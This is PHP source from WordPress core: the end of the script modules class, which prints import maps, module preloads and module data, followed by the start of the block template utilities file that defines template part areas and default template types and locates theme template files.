* Modules can only be printed in the head for block themes because only with
* block themes will import map be fully populated by modules discovered by
* rendering the block template. In classic themes, modules are enqueued during
* template rendering, thus the import map must be printed in the footer,
* followed by all enqueued modules.
*/
add_action( 'wp_head', array( $this, 'print_head_enqueued_script_modules' ) );
}
add_action( 'wp_footer', array( $this, 'print_enqueued_script_modules' ) );
add_action( $position, array( $this, 'print_script_module_preloads' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_import_map' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_enqueued_script_modules' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_script_module_preloads' ) );
add_action( 'wp_footer', array( $this, 'print_script_module_data' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_script_module_data' ) );
add_action( 'wp_footer', array( $this, 'print_a11y_script_module_html' ), 20 );
add_action( 'admin_print_footer_scripts', array( $this, 'print_a11y_script_module_html' ), 20 );
}
/**
* Gets the highest fetch priority for the provided script IDs.
*
* @since 6.9.0
*
* @param string[] $ids Script module IDs.
* @return 'auto'|'low'|'high' Highest fetch priority for the provided script module IDs.
*/
private function get_highest_fetchpriority( array $ids ): string {
static $high_priority_index = null;
if ( null === $high_priority_index ) {
$high_priority_index = count( $this->priorities ) - 1;
}
$highest_priority_index = 0;
foreach ( $ids as $id ) {
if ( isset( $this->registered[ $id ] ) ) {
$highest_priority_index = (int) max(
$highest_priority_index,
(int) array_search( $this->registered[ $id ]['fetchpriority'], $this->priorities, true )
);
if ( $high_priority_index === $highest_priority_index ) {
break;
}
}
}
return $this->priorities[ $highest_priority_index ];
}
/**
* Prints the enqueued script modules in head.
*
* This is only used in block themes.
*
* @since 6.9.0
*/
public function print_head_enqueued_script_modules() {
foreach ( $this->get_sorted_dependencies( $this->queue ) as $id ) {
if (
isset( $this->registered[ $id ] ) &&
! $this->registered[ $id ]['in_footer']
) {
// If any dependency is set to be printed in footer, skip printing this module in head.
$dependencies = array_keys( $this->get_dependencies( array( $id ) ) );
foreach ( $dependencies as $dependency_id ) {
if (
in_array( $dependency_id, $this->queue, true ) &&
isset( $this->registered[ $dependency_id ] ) &&
$this->registered[ $dependency_id ]['in_footer']
) {
continue 2;
}
}
$this->print_script_module( $id );
}
}
}
/**
* Prints the enqueued script modules in footer.
*
* @since 6.5.0
*/
public function print_enqueued_script_modules() {
foreach ( $this->get_sorted_dependencies( $this->queue ) as $id ) {
$this->print_script_module( $id );
}
}
/**
* Prints the enqueued script module using script tags with type="module"
* attributes.
*
* @since 6.9.0
*
* @param string $id The script module identifier.
*/
private function print_script_module( string $id ) {
if ( in_array( $id, $this->done, true ) || ! in_array( $id, $this->queue, true ) ) {
return;
}
$this->done[] = $id;
$src = $this->get_src( $id );
if ( '' === $src ) {
return;
}
$attributes = array(
'type' => 'module',
'src' => $src,
'id' => $id . '-js-module',
);
$script_module = $this->registered[ $id ];
$queued_dependents = array_intersect( $this->queue, $this->get_recursive_dependents( $id ) );
$fetchpriority = $this->get_highest_fetchpriority( array_merge( array( $id ), $queued_dependents ) );
if ( 'auto' !== $fetchpriority ) {
$attributes['fetchpriority'] = $fetchpriority;
}
if ( $fetchpriority !== $script_module['fetchpriority'] ) {
$attributes['data-wp-fetchpriority'] = $script_module['fetchpriority'];
}
wp_print_script_tag( $attributes );
}
/**
* Prints the static dependencies of the enqueued script modules using
* link tags with rel="modulepreload" attributes.
*
* If a script module is marked for enqueue, it will not be preloaded.
*
* @since 6.5.0
*/
public function print_script_module_preloads() {
$dependency_ids = $this->get_sorted_dependencies( $this->queue, array( 'static' ) );
foreach ( $dependency_ids as $id ) {
// Don't preload if it's marked for enqueue.
if ( in_array( $id, $this->queue, true ) ) {
continue;
}
$src = $this->get_src( $id );
if ( '' === $src ) {
continue;
}
$enqueued_dependents = array_intersect( $this->get_recursive_dependents( $id ), $this->queue );
$highest_fetchpriority = $this->get_highest_fetchpriority( $enqueued_dependents );
printf(
'<link rel="modulepreload" href="%s" id="%s"',
esc_url( $src ),
esc_attr( $id . '-js-modulepreload' )
);
if ( 'auto' !== $highest_fetchpriority ) {
printf( ' fetchpriority="%s"', esc_attr( $highest_fetchpriority ) );
}
if ( $highest_fetchpriority !== $this->registered[ $id ]['fetchpriority'] && 'auto' !== $this->registered[ $id ]['fetchpriority'] ) {
printf( ' data-wp-fetchpriority="%s"', esc_attr( $this->registered[ $id ]['fetchpriority'] ) );
}
echo ">\n";
}
}
/**
* Prints the import map using a script tag with a type="importmap" attribute.
*
* @since 6.5.0
*/
public function print_import_map() {
$import_map = $this->get_import_map();
if ( ! empty( $import_map['imports'] ) ) {
wp_print_inline_script_tag(
(string) wp_json_encode( $import_map, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
array(
'type' => 'importmap',
'id' => 'wp-importmap',
)
);
}
}
/**
* Returns the import map array.
*
* @since 6.5.0
*
* @return array Array with an `imports` key mapping to an array of script module identifiers and their respective
* URLs, including the version query.
*/
private function get_import_map(): array {
$imports = array();
foreach ( array_keys( $this->get_dependencies( $this->queue ) ) as $id ) {
$src = $this->get_src( $id );
if ( '' !== $src ) {
$imports[ $id ] = $src;
}
}
return array( 'imports' => $imports );
}
/**
* Retrieves the list of script modules marked for enqueue.
*
* Even though this is a private method and is unused in core, there are ecosystem plugins accessing it via the
* Reflection API. The ecosystem should rather use {@see self::get_queue()}.
*
* @since 6.5.0
*
* @return array<string, array> Script modules marked for enqueue, keyed by script module identifier.
*/
private function get_marked_for_enqueue(): array {
return wp_array_slice_assoc(
$this->registered,
$this->queue
);
}
/**
* Retrieves all the dependencies for the given script module identifiers, filtered by import types.
*
* It will consolidate an array containing a set of unique dependencies based
* on the requested import types: 'static', 'dynamic', or both. This method is
* recursive and also retrieves dependencies of the dependencies.
*
* @since 6.5.0
*
* @param string[] $ids The identifiers of the script modules for which to gather dependencies.
* @param string[] $import_types Optional. Import types of dependencies to retrieve: 'static', 'dynamic', or both.
* Default is both.
* @return array<string, array> List of dependencies, keyed by script module identifier.
*/
private function get_dependencies( array $ids, array $import_types = array( 'static', 'dynamic' ) ): array {
$all_dependencies = array();
$id_queue = $ids;
while ( ! empty( $id_queue ) ) {
$id = array_shift( $id_queue );
if ( ! isset( $this->registered[ $id ] ) ) {
continue;
}
foreach ( $this->registered[ $id ]['dependencies'] as $dependency ) {
if (
! isset( $all_dependencies[ $dependency['id'] ] ) &&
in_array( $dependency['import'], $import_types, true ) &&
isset( $this->registered[ $dependency['id'] ] )
) {
$all_dependencies[ $dependency['id'] ] = $this->registered[ $dependency['id'] ];
// Add this dependency to the list to get dependencies for.
$id_queue[] = $dependency['id'];
}
}
}
return $all_dependencies;
}
/**
* Gets all dependents of a script module.
*
* This is not recursive.
*
* @since 6.9.0
*
* @see WP_Scripts::get_dependents()
*
* @param string $id The script ID.
* @return string[] Script module IDs.
*/
private function get_dependents( string $id ): array {
// Check if dependents map for the handle in question is present. If so, use it.
if ( isset( $this->dependents_map[ $id ] ) ) {
return $this->dependents_map[ $id ];
}
$dependents = array();
// Iterate over all registered scripts, finding dependents of the script passed to this method.
foreach ( $this->registered as $registered_id => $args ) {
if ( in_array( $id, wp_list_pluck( $args['dependencies'], 'id' ), true ) ) {
$dependents[] = $registered_id;
}
}
// Add the module's dependents to the map to ease future lookups.
$this->dependents_map[ $id ] = $dependents;
return $dependents;
}
/**
* Gets all recursive dependents of a script module.
*
* @since 6.9.0
*
* @see WP_Scripts::get_dependents()
*
* @param string $id The script ID.
* @return string[] Script module IDs.
*/
private function get_recursive_dependents( string $id ): array {
$dependents = array();
$id_queue = array( $id );
$processed = array();
while ( ! empty( $id_queue ) ) {
$current_id = array_shift( $id_queue );
// Skip unregistered or already-processed script modules.
if ( ! isset( $this->registered[ $current_id ] ) || isset( $processed[ $current_id ] ) ) {
continue;
}
// Mark as processed to guard against infinite loops from circular dependencies.
$processed[ $current_id ] = true;
// Find the direct dependents of the current script.
foreach ( $this->get_dependents( $current_id ) as $dependent_id ) {
// Only add the dependent if we haven't found it before.
if ( ! isset( $dependents[ $dependent_id ] ) ) {
$dependents[ $dependent_id ] = true;
// Add dependency to the queue.
$id_queue[] = $dependent_id;
}
}
}
return array_keys( $dependents );
}
/**
* Sorts the given script module identifiers based on their dependencies.
*
* It will return a list of script module identifiers sorted in the order
* they should be printed, so that dependencies are printed before the script
* modules that depend on them.
*
* @since 6.9.0
*
* @param string[] $ids The identifiers of the script modules to sort.
* @param string[] $import_types Optional. Import types of dependencies to retrieve: 'static', 'dynamic', or both.
* Default is both.
* @return string[] Sorted list of script module identifiers.
*/
private function get_sorted_dependencies( array $ids, array $import_types = array( 'static', 'dynamic' ) ): array {
$sorted = array();
foreach ( $ids as $id ) {
$this->sort_item_dependencies( $id, $import_types, $sorted );
}
return array_unique( $sorted );
}
/**
* Recursively sorts the dependencies for a single script module identifier.
*
* @since 6.9.0
*
* @param string $id The identifier of the script module to sort.
* @param string[] $import_types Optional. Import types of dependencies to retrieve: 'static', 'dynamic', or both.
* @param string[] &$sorted The array of sorted identifiers, passed by reference.
* @return bool True on success, false on failure (e.g., missing dependency).
*/
private function sort_item_dependencies( string $id, array $import_types, array &$sorted ): bool {
// If already processed, don't do it again.
if ( in_array( $id, $sorted, true ) ) {
return true;
}
// If the item doesn't exist, fail.
if ( ! isset( $this->registered[ $id ] ) ) {
return false;
}
$dependency_ids = array();
foreach ( $this->registered[ $id ]['dependencies'] as $dependency ) {
if ( in_array( $dependency['import'], $import_types, true ) ) {
$dependency_ids[] = $dependency['id'];
}
}
// If the item requires dependencies that do not exist, fail.
$missing_dependencies = array_diff( $dependency_ids, array_keys( $this->registered ) );
if ( count( $missing_dependencies ) > 0 ) {
if ( ! in_array( $id, $this->modules_with_missing_dependencies, true ) ) {
_doing_it_wrong(
get_class( $this ) . '::register',
sprintf(
/* translators: 1: Script module ID, 2: List of missing dependency IDs. */
__( 'The script module with the ID "%1$s" was enqueued with dependencies that are not registered: %2$s.' ),
$id,
implode( wp_get_list_item_separator(), $missing_dependencies )
),
'6.9.1'
);
$this->modules_with_missing_dependencies[] = $id;
}
return false;
}
// Recursively process dependencies.
foreach ( $dependency_ids as $dependency_id ) {
if ( ! $this->sort_item_dependencies( $dependency_id, $import_types, $sorted ) ) {
// A dependency failed to resolve, so this branch fails.
return false;
}
}
// All dependencies are sorted, so we can now add the current item.
$sorted[] = $id;
return true;
}
/**
* Gets the versioned URL for a script module src.
*
* If $version is set to false, the version number is the currently installed
* WordPress version. If $version is set to null, no version is added.
* Otherwise, the string passed in $version is used.
*
* @since 6.5.0
*
* @param string $id The script module identifier.
* @return string The script module src with a version if relevant.
*/
private function get_src( string $id ): string {
if ( ! isset( $this->registered[ $id ] ) ) {
return '';
}
$script_module = $this->registered[ $id ];
$src = $script_module['src'];
if ( '' !== $src ) {
if ( false === $script_module['version'] ) {
$src = add_query_arg( 'ver', get_bloginfo( 'version' ), $src );
} elseif ( null !== $script_module['version'] ) {
$src = add_query_arg( 'ver', $script_module['version'], $src );
}
}
/**
* Filters the script module source.
*
* @since 6.5.0
*
* @param string $src Module source URL.
* @param string $id Module identifier.
*/
$src = apply_filters( 'script_module_loader_src', $src, $id );
if ( ! is_string( $src ) ) {
$src = '';
}
return $src;
}
/**
* Print data associated with Script Modules.
*
* The data will be embedded in the page HTML and can be read by Script Modules on page load.
*
* @since 6.7.0
*
* Data can be associated with a Script Module via the
* {@see "script_module_data_{$module_id}"} filter.
*
* The data for a Script Module will be serialized as JSON in a script tag with an ID of the
* form `wp-script-module-data-{$module_id}`.
*/
public function print_script_module_data(): void {
$modules = array();
foreach ( array_unique( $this->queue ) as $id ) {
if ( '@wordpress/a11y' === $id ) {
$this->a11y_available = true;
}
$modules[ $id ] = true;
}
foreach ( array_keys( $this->get_import_map()['imports'] ) as $id ) {
if ( '@wordpress/a11y' === $id ) {
$this->a11y_available = true;
}
$modules[ $id ] = true;
}
foreach ( array_keys( $modules ) as $module_id ) {
/**
* Filters data associated with a given Script Module.
*
* Script Modules may require data that is required for initialization or is essential
* to have immediately available on page load. These are suitable use cases for
* this data.
*
* The dynamic portion of the hook name, `$module_id`, refers to the Script Module ID
* that the data is associated with.
*
* This is best suited to pass essential data that must be available to the module for
* initialization or immediately on page load. It does not replace the REST API or
* fetching data from the client.
*
* Example:
*
* add_filter(
* 'script_module_data_MyScriptModuleID',
* function ( array $data ): array {
* $data['dataForClient'] = 'ok';
* return $data;
* }
* );
*
* If the filter returns no data (an empty array), nothing will be embedded in the page.
*
* The data for a given Script Module, if provided, will be JSON serialized in a script
* tag with an ID of the form `wp-script-module-data-{$module_id}`.
*
* The data can be read on the client with a pattern like this:
*
* Example:
*
* const dataContainer = document.getElementById( 'wp-script-module-data-MyScriptModuleID' );
* let data = {};
* if ( dataContainer ) {
* try {
* data = JSON.parse( dataContainer.textContent );
* } catch {}
* }
* // data.dataForClient === 'ok';
* initMyScriptModuleWithData( data );
*
* @since 6.7.0
*
* @param array $data The data associated with the Script Module.
*/
$data = apply_filters( "script_module_data_{$module_id}", array() );
if ( is_array( $data ) && array() !== $data ) {
/*
* This data will be printed as JSON inside a script tag like this:
* <script type="application/json"></script>
*
* A script tag must be closed by a sequence beginning with `</`. It's impossible to
* close a script tag without using `<`. We ensure that `<` is escaped and `/` can
* remain unescaped, so `</script>` will be printed as `\u003C/script\u00E3`.
*
* - JSON_HEX_TAG: All < and > are converted to \u003C and \u003E.
* - JSON_UNESCAPED_SLASHES: Don't escape /.
*
* If the page will use UTF-8 encoding, it's safe to print unescaped unicode:
*
* - JSON_UNESCAPED_UNICODE: Encode multibyte Unicode characters literally (instead of as `\uXXXX`).
* - JSON_UNESCAPED_LINE_TERMINATORS: The line terminators are kept unescaped when
* JSON_UNESCAPED_UNICODE is supplied. It uses the same behaviour as it was
* before PHP 7.1 without this constant. Available as of PHP 7.1.0.
*
* The JSON specification requires encoding in UTF-8, so if the generated HTML page
* is not encoded in UTF-8 then it's not safe to include those literals. They must
* be escaped to avoid encoding issues.
*
* @see https://www.rfc-editor.org/rfc/rfc8259.html for details on encoding requirements.
* @see https://www.php.net/manual/en/json.constants.php for details on these constants.
* @see https://html.spec.whatwg.org/#script-data-state for details on script tag parsing.
*/
$json_encode_flags = JSON_HEX_TAG | JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_LINE_TERMINATORS;
if ( ! is_utf8_charset() ) {
$json_encode_flags = JSON_HEX_TAG | JSON_UNESCAPED_SLASHES;
}
wp_print_inline_script_tag(
(string) wp_json_encode(
$data,
$json_encode_flags
),
array(
'type' => 'application/json',
'id' => "wp-script-module-data-{$module_id}",
)
);
}
}
}
/**
* @access private This is only intended to be called by the registered actions.
*
* @since 6.7.0
*/
public function print_a11y_script_module_html() {
if ( ! $this->a11y_available ) {
return;
}
echo '<div style="position:absolute;margin:-1px;padding:0;height:1px;width:1px;overflow:hidden;clip-path:inset(50%);border:0;word-wrap:normal !important;">'
. '<p id="a11y-speak-intro-text" class="a11y-speak-intro-text" hidden>' . esc_html__( 'Notifications' ) . '</p>'
. '<div id="a11y-speak-assertive" class="a11y-speak-region" aria-live="assertive" aria-relevant="additions text" aria-atomic="true"></div>'
. '<div id="a11y-speak-polite" class="a11y-speak-region" aria-live="polite" aria-relevant="additions text" aria-atomic="true"></div>'
. '</div>';
}
}
block-template-utils.php 0000666 00000172024 15224151220 0011322 0 ustar 00 <?php
/**
* Utilities used to fetch and create templates and template parts.
*
* @package WordPress
* @since 5.8.0
*/
// Define constants for supported wp_template_part_area taxonomy.
if ( ! defined( 'WP_TEMPLATE_PART_AREA_HEADER' ) ) {
define( 'WP_TEMPLATE_PART_AREA_HEADER', 'header' );
}
if ( ! defined( 'WP_TEMPLATE_PART_AREA_FOOTER' ) ) {
define( 'WP_TEMPLATE_PART_AREA_FOOTER', 'footer' );
}
if ( ! defined( 'WP_TEMPLATE_PART_AREA_SIDEBAR' ) ) {
define( 'WP_TEMPLATE_PART_AREA_SIDEBAR', 'sidebar' );
}
if ( ! defined( 'WP_TEMPLATE_PART_AREA_UNCATEGORIZED' ) ) {
define( 'WP_TEMPLATE_PART_AREA_UNCATEGORIZED', 'uncategorized' );
}
/**
* For backward compatibility reasons,
* block themes might be using block-templates or block-template-parts,
* this function ensures we fallback to these folders properly.
*
* @since 5.9.0
*
* @param string $theme_stylesheet The stylesheet. Default is to leverage the main theme root.
*
* @return string[] {
* Folder names used by block themes.
*
* @type string $wp_template Theme-relative directory name for block templates.
* @type string $wp_template_part Theme-relative directory name for block template parts.
* }
*/
function get_block_theme_folders( $theme_stylesheet = null ) {
$theme = wp_get_theme( (string) $theme_stylesheet );
if ( ! $theme->exists() ) {
// Return the default folders if the theme doesn't exist.
return array(
'wp_template' => 'templates',
'wp_template_part' => 'parts',
);
}
return $theme->get_block_template_folders();
}
/**
* Returns a filtered list of allowed area values for template parts.
*
* @since 5.9.0
*
* @return array[] {
* The allowed template part area values.
*
* @type array ...$0 {
* Data for the allowed template part area.
*
* @type string $area Template part area name.
* @type string $label Template part area label.
* @type string $description Template part area description.
* @type string $icon Template part area icon.
* @type string $area_tag Template part area tag.
* }
* }
*/
function get_allowed_block_template_part_areas() {
$default_area_definitions = array(
array(
'area' => WP_TEMPLATE_PART_AREA_UNCATEGORIZED,
'label' => _x( 'General', 'template part area' ),
'description' => __(
'General templates often perform a specific role like displaying post content, and are not tied to any particular area.'
),
'icon' => 'layout',
'area_tag' => 'div',
),
array(
'area' => WP_TEMPLATE_PART_AREA_HEADER,
'label' => _x( 'Header', 'template part area' ),
'description' => __(
'The Header template defines a page area that typically contains a title, logo, and main navigation.'
),
'icon' => 'header',
'area_tag' => 'header',
),
array(
'area' => WP_TEMPLATE_PART_AREA_FOOTER,
'label' => _x( 'Footer', 'template part area' ),
'description' => __(
'The Footer template defines a page area that typically contains site credits, social links, or any other combination of blocks.'
),
'icon' => 'footer',
'area_tag' => 'footer',
),
);
/**
* Filters the list of allowed template part area values.
*
* @since 5.9.0
*
* @param array[] $default_area_definitions {
* The allowed template part area values.
*
* @type array ...$0 {
* Data for the template part area.
*
* @type string $area Template part area name.
* @type string $label Template part area label.
* @type string $description Template part area description.
* @type string $icon Template part area icon.
* @type string $area_tag Template part area tag.
* }
* }
*/
return apply_filters( 'default_wp_template_part_areas', $default_area_definitions );
}
/**
* Returns a filtered list of default template types, containing their
* localized titles and descriptions.
*
* @since 5.9.0
*
* @return array[] {
* The default template types.
*
* @type array ...$0 {
* Data for the template type.
*
* @type string $title Template type title.
* @type string $description Template type description.
* }
* }
*/
function get_default_block_template_types() {
$default_template_types = array(
'index' => array(
'title' => _x( 'Index', 'Template name' ),
'description' => __( 'Used as a fallback template for all pages when a more specific template is not defined.' ),
),
'home' => array(
'title' => _x( 'Blog Home', 'Template name' ),
'description' => __( 'Displays the latest posts as either the site homepage or as the "Posts page" as defined under reading settings. If it exists, the Front Page template overrides this template when posts are shown on the homepage.' ),
),
'front-page' => array(
'title' => _x( 'Front Page', 'Template name' ),
'description' => __( 'Displays your site\'s homepage, whether it is set to display latest posts or a static page. The Front Page template takes precedence over all templates.' ),
),
'singular' => array(
'title' => _x( 'Single Entries', 'Template name' ),
'description' => __( 'Displays any single entry, such as a post or a page. This template will serve as a fallback when a more specific template (e.g. Single Post, Page, or Attachment) cannot be found.' ),
),
'single' => array(
'title' => _x( 'Single Posts', 'Template name' ),
'description' => __( 'Displays a single post on your website unless a custom template has been applied to that post or a dedicated template exists.' ),
),
'page' => array(
'title' => _x( 'Pages', 'Template name' ),
'description' => __( 'Displays a static page unless a custom template has been applied to that page or a dedicated template exists.' ),
),
'archive' => array(
'title' => _x( 'All Archives', 'Template name' ),
'description' => __( 'Displays any archive, including posts by a single author, category, tag, taxonomy, custom post type, and date. This template will serve as a fallback when more specific templates (e.g. Category or Tag) cannot be found.' ),
),
'author' => array(
'title' => _x( 'Author Archives', 'Template name' ),
'description' => __( 'Displays a single author\'s post archive. This template will serve as a fallback when a more specific template (e.g. Author: Admin) cannot be found.' ),
),
'category' => array(
'title' => _x( 'Category Archives', 'Template name' ),
'description' => __( 'Displays a post category archive. This template will serve as a fallback when a more specific template (e.g. Category: Recipes) cannot be found.' ),
),
'taxonomy' => array(
'title' => _x( 'Taxonomy', 'Template name' ),
'description' => __( 'Displays a custom taxonomy archive. Like categories and tags, taxonomies have terms which you use to classify things. For example: a taxonomy named "Art" can have multiple terms, such as "Modern" and "18th Century." This template will serve as a fallback when a more specific template (e.g. Taxonomy: Art) cannot be found.' ),
),
'date' => array(
'title' => _x( 'Date Archives', 'Template name' ),
'description' => __( 'Displays a post archive when a specific date is visited (e.g., example.com/2023/).' ),
),
'tag' => array(
'title' => _x( 'Tag Archives', 'Template name' ),
'description' => __( 'Displays a post tag archive. This template will serve as a fallback when a more specific template (e.g. Tag: Pizza) cannot be found.' ),
),
'attachment' => array(
'title' => __( 'Attachment Pages' ),
'description' => __( 'Displays when a visitor views the dedicated page that exists for any media attachment.' ),
),
'search' => array(
'title' => _x( 'Search Results', 'Template name' ),
'description' => __( 'Displays when a visitor performs a search on your website.' ),
),
'privacy-policy' => array(
'title' => __( 'Privacy Policy' ),
'description' => __( 'Displays your site\'s Privacy Policy page.' ),
),
'404' => array(
'title' => _x( 'Page: 404', 'Template name' ),
'description' => __( 'Displays when a visitor views a non-existent page, such as a dead link or a mistyped URL.' ),
),
);
// Add a title and description to post format templates.
$post_formats = get_post_format_strings();
foreach ( $post_formats as $post_format_slug => $post_format_name ) {
$default_template_types[ 'taxonomy-post_format-post-format-' . $post_format_slug ] = array(
'title' => sprintf(
/* translators: %s: Post format name. */
_x( 'Post Format: %s', 'Template name' ),
$post_format_name
),
'description' => sprintf(
/* translators: %s: Post format name. */
__( 'Displays the %s post format archive.' ),
$post_format_name
),
);
}
/**
* Filters the list of default template types.
*
* @since 5.9.0
*
* @param array[] $default_template_types {
* The default template types.
*
* @type array ...$0 {
* Data for the template type.
*
* @type string $title Template type title.
* @type string $description Template type description.
* }
* }
*/
return apply_filters( 'default_template_types', $default_template_types );
}
/**
* Checks whether the input 'area' is a supported value.
* Returns the input if supported, otherwise returns the 'uncategorized' value.
*
* @since 5.9.0
* @access private
*
* @param string $type Template part area name.
* @return string Input if supported, else the uncategorized value.
*/
function _filter_block_template_part_area( $type ) {
$allowed_areas = array_map(
static function ( $item ) {
return $item['area'];
},
get_allowed_block_template_part_areas()
);
if ( in_array( $type, $allowed_areas, true ) ) {
return $type;
}
$warning_message = sprintf(
/* translators: %1$s: Template area type, %2$s: the uncategorized template area value. */
__( '"%1$s" is not a supported wp_template_part area value and has been added as "%2$s".' ),
$type,
WP_TEMPLATE_PART_AREA_UNCATEGORIZED
);
wp_trigger_error( __FUNCTION__, $warning_message );
return WP_TEMPLATE_PART_AREA_UNCATEGORIZED;
}
/**
* Finds all nested template part file paths in a theme's directory.
*
* @since 5.9.0
* @access private
*
* @param string $base_directory The theme's file path.
* @return string[] A list of paths to all template part files.
*/
function _get_block_templates_paths( $base_directory ) {
static $template_path_list = array();
if ( isset( $template_path_list[ $base_directory ] ) ) {
return $template_path_list[ $base_directory ];
}
$path_list = array();
if ( is_dir( $base_directory ) ) {
$nested_files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $base_directory ) );
$nested_html_files = new RegexIterator( $nested_files, '/^.+\.html$/i', RecursiveRegexIterator::GET_MATCH );
foreach ( $nested_html_files as $path => $file ) {
$path_list[] = $path;
}
}
$template_path_list[ $base_directory ] = $path_list;
return $path_list;
}
/**
* Retrieves the template file from the theme for a given slug.
*
* @since 5.9.0
* @access private
*
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
* @param string $slug Template slug.
* @return array|null {
* Array with template metadata if $template_type is one of 'wp_template' or 'wp_template_part',
* null otherwise.
*
* @type string $slug Template slug.
* @type string $path Template file path.
* @type string $theme Theme slug.
* @type string $type Template type.
* @type string $area Template area. Only for 'wp_template_part'.
* @type string $title Optional. Template title.
* @type string[] $postTypes Optional. List of post types that the template supports. Only for 'wp_template'.
* }
*/
function _get_block_template_file( $template_type, $slug ) {
if ( 'wp_template' !== $template_type && 'wp_template_part' !== $template_type ) {
return null;
}
$themes = array(
get_stylesheet() => get_stylesheet_directory(),
get_template() => get_template_directory(),
);
foreach ( $themes as $theme_slug => $theme_dir ) {
$template_base_paths = get_block_theme_folders( $theme_slug );
$file_path = $theme_dir . '/' . $template_base_paths[ $template_type ] . '/' . $slug . '.html';
if ( file_exists( $file_path ) ) {
$new_template_item = array(
'slug' => $slug,
'path' => $file_path,
'theme' => $theme_slug,
'type' => $template_type,
);
if ( 'wp_template_part' === $template_type ) {
return _add_block_template_part_area_info( $new_template_item );
}
// If it's not a `wp_template_part`, it must be a `wp_template`.
return _add_block_template_info( $new_template_item );
}
}
return null;
}
/**
* Retrieves the template files from the theme.
*
* @since 5.9.0
* @since 6.3.0 Added the `$query` parameter.
* @access private
*
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
* @param array $query {
* Arguments to retrieve templates. Optional, empty by default.
*
* @type string[] $slug__in List of slugs to include.
* @type string[] $slug__not_in List of slugs to skip.
* @type string $area A 'wp_template_part_area' taxonomy value to filter by (for 'wp_template_part' template type only).
* @type string $post_type Post type to get the templates for.
* }
*
* @return array|null Template files on success, null if `$template_type` is not matched.
*/
function _get_block_templates_files( $template_type, $query = array() ) {
if ( 'wp_template' !== $template_type && 'wp_template_part' !== $template_type ) {
return null;
}
$default_template_types = array();
if ( 'wp_template' === $template_type ) {
$default_template_types = get_default_block_template_types();
}
// Prepare metadata from $query.
$slugs_to_include = isset( $query['slug__in'] ) ? $query['slug__in'] : array();
$slugs_to_skip = isset( $query['slug__not_in'] ) ? $query['slug__not_in'] : array();
$area = isset( $query['area'] ) ? $query['area'] : null;
$post_type = isset( $query['post_type'] ) ? $query['post_type'] : '';
$stylesheet = get_stylesheet();
$template = get_template();
$themes = array(
$stylesheet => get_stylesheet_directory(),
);
// Add the parent theme if it's not the same as the current theme.
if ( $stylesheet !== $template ) {
$themes[ $template ] = get_template_directory();
}
$template_files = array();
foreach ( $themes as $theme_slug => $theme_dir ) {
$template_base_paths = get_block_theme_folders( $theme_slug );
$theme_template_files = _get_block_templates_paths( $theme_dir . '/' . $template_base_paths[ $template_type ] );
foreach ( $theme_template_files as $template_file ) {
$template_base_path = $template_base_paths[ $template_type ];
$template_slug = substr(
$template_file,
// Starting position of slug.
strpos( $template_file, $template_base_path . DIRECTORY_SEPARATOR ) + 1 + strlen( $template_base_path ),
// Subtract ending '.html'.
-5
);
// Skip this item if its slug doesn't match any of the slugs to include.
if ( ! empty( $slugs_to_include ) && ! in_array( $template_slug, $slugs_to_include, true ) ) {
continue;
}
// Skip this item if its slug matches any of the slugs to skip.
if ( ! empty( $slugs_to_skip ) && in_array( $template_slug, $slugs_to_skip, true ) ) {
continue;
}
/*
* The child theme items (stylesheet) are processed before the parent theme's (template).
* If a child theme defines a template, prevent the parent template from being added to the list as well.
*/
if ( isset( $template_files[ $template_slug ] ) ) {
continue;
}
$new_template_item = array(
'slug' => $template_slug,
'path' => $template_file,
'theme' => $theme_slug,
'type' => $template_type,
);
if ( 'wp_template_part' === $template_type ) {
$candidate = _add_block_template_part_area_info( $new_template_item );
if ( ! isset( $area ) || $area === $candidate['area'] ) {
$template_files[ $template_slug ] = $candidate;
}
}
if ( 'wp_template' === $template_type ) {
$candidate = _add_block_template_info( $new_template_item );
$is_custom = ! isset( $default_template_types[ $candidate['slug'] ] );
if (
! $post_type ||
( $post_type && isset( $candidate['postTypes'] ) && in_array( $post_type, $candidate['postTypes'], true ) )
) {
$template_files[ $template_slug ] = $candidate;
}
// The custom templates with no associated post types are available for all post types.
if ( $post_type && ! isset( $candidate['postTypes'] ) && $is_custom ) {
$template_files[ $template_slug ] = $candidate;
}
}
}
}
return array_values( $template_files );
}
/**
* Attempts to add custom template information to the template item.
*
* @since 5.9.0
* @access private
*
* @param array $template_item Template to add information to (requires 'slug' field).
* @return array Template item.
*/
function _add_block_template_info( $template_item ) {
if ( ! wp_theme_has_theme_json() ) {
return $template_item;
}
$theme_data = wp_get_theme_data_custom_templates();
if ( isset( $theme_data[ $template_item['slug'] ] ) ) {
$template_item['title'] = $theme_data[ $template_item['slug'] ]['title'];
$template_item['postTypes'] = $theme_data[ $template_item['slug'] ]['postTypes'];
}
return $template_item;
}
/**
* Attempts to add the template part's area information to the input template.
*
* @since 5.9.0
* @access private
*
* @param array $template_info Template to add information to (requires 'type' and 'slug' fields).
* @return array Template info.
*/
function _add_block_template_part_area_info( $template_info ) {
if ( wp_theme_has_theme_json() ) {
$theme_data = wp_get_theme_data_template_parts();
}
if ( isset( $theme_data[ $template_info['slug'] ]['area'] ) ) {
$template_info['title'] = $theme_data[ $template_info['slug'] ]['title'];
$template_info['area'] = _filter_block_template_part_area( $theme_data[ $template_info['slug'] ]['area'] );
} else {
$template_info['area'] = WP_TEMPLATE_PART_AREA_UNCATEGORIZED;
}
return $template_info;
}
/**
* Returns an array containing the references of
* the passed blocks and their inner blocks.
*
* @since 5.9.0
* @access private
*
* @param array $blocks array of blocks.
* @return array block references to the passed blocks and their inner blocks.
*/
function _flatten_blocks( &$blocks ) {
$all_blocks = array();
$queue = array();
foreach ( $blocks as &$block ) {
$queue[] = &$block;
}
while ( count( $queue ) > 0 ) {
$block = &$queue[0];
array_shift( $queue );
$all_blocks[] = &$block;
if ( ! empty( $block['innerBlocks'] ) ) {
foreach ( $block['innerBlocks'] as &$inner_block ) {
$queue[] = &$inner_block;
}
}
}
return $all_blocks;
}
/**
* Injects the active theme's stylesheet as a `theme` attribute
* into a given template part block.
*
* @since 6.4.0
* @access private
*
* @param array $block a parsed block.
*/
